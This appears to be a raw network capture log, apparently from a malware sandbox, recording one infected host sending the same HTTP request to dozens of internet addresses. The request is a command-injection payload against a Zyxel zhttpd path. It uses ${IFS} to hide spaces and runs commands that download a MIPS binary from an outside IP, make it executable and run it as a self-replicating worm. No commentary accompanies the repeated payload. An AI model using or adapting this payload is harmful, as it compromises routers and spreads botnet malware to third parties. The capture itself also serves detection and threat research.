                                                      Feb 2, 2024 06:35:46.499389887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2902192.168.2.1441474171.168.172.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499424934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2903192.168.2.145917244.246.201.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499470949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2904192.168.2.1450908121.135.121.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499492884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2905192.168.2.145773672.204.38.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499552965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2906192.168.2.1442578111.240.241.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499581099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2907192.168.2.145177497.62.222.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499643087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2908192.168.2.1432870165.49.162.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499664068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2909192.168.2.1442136114.241.18.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499713898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2910192.168.2.143539651.218.164.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499753952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2911192.168.2.1453998174.81.111.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499811888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2912192.168.2.1449000202.226.187.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499834061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2913192.168.2.146092650.237.176.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499874115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2914192.168.2.1460562151.29.95.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499917984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2915192.168.2.1456716219.225.145.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499954939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2916192.168.2.1442454108.51.180.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.499999046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2917192.168.2.144002884.45.34.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.500056028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2918192.168.2.1456042210.4.181.199443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.500087023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2919192.168.2.1456606218.150.250.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.500128031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2920192.168.2.144000225.209.202.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:46.500169039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2921192.168.2.1444674218.120.168.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510008097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2922192.168.2.145021817.247.204.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510164022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2923192.168.2.1449560142.175.206.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510205984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2924192.168.2.1443778179.214.123.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510232925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2925192.168.2.1440142217.4.200.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510277987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2926192.168.2.1443842154.101.72.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510310888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2927192.168.2.143302268.226.36.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510370016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2928192.168.2.1448680196.177.57.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510411978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2929192.168.2.144246471.255.101.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510443926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2930192.168.2.1444354156.126.255.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510492086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2931192.168.2.145166685.56.102.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510528088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2932192.168.2.145029849.155.18.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510552883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2933192.168.2.1436038132.76.177.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510618925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2934192.168.2.1452956183.230.173.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510646105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2935192.168.2.143288042.192.211.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510679960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2936192.168.2.143836287.89.20.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510740042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2937192.168.2.1444378219.208.130.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510787010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2938192.168.2.1444390107.169.25.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510809898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2939192.168.2.145570838.182.54.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510839939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2940192.168.2.1456974145.19.42.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510894060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2941192.168.2.1445192188.205.135.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510941982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2942192.168.2.145471414.59.241.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.510970116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2943192.168.2.1433534202.147.64.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511002064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2944192.168.2.1454728189.80.141.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511065006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2945192.168.2.1439596205.224.176.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511096954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2946192.168.2.145264058.235.17.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511142969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2947192.168.2.1454410142.133.146.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511174917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2948192.168.2.144890436.93.89.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511243105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2949192.168.2.1445778119.197.146.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511286020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2950192.168.2.1460638217.138.92.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511313915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2951192.168.2.1452760123.219.136.47443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511372089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2952192.168.2.144263664.220.176.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511421919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2953192.168.2.1436708141.185.14.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511468887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2954192.168.2.143752220.15.147.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511501074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2955192.168.2.1452400152.171.187.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511550903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2956192.168.2.1451478183.244.235.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511588097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2957192.168.2.1435432128.83.251.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511641026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2958192.168.2.143910281.27.81.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511688948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2959192.168.2.1442810185.187.193.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511739969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2960192.168.2.145313684.126.64.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511775970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2961192.168.2.143902840.50.122.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511816978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2962192.168.2.1447028180.26.237.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511842966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2963192.168.2.145437831.64.120.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:47.511890888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2964192.168.2.144453272.134.0.215443
                                                      TimestampBytes transferredDirectionData
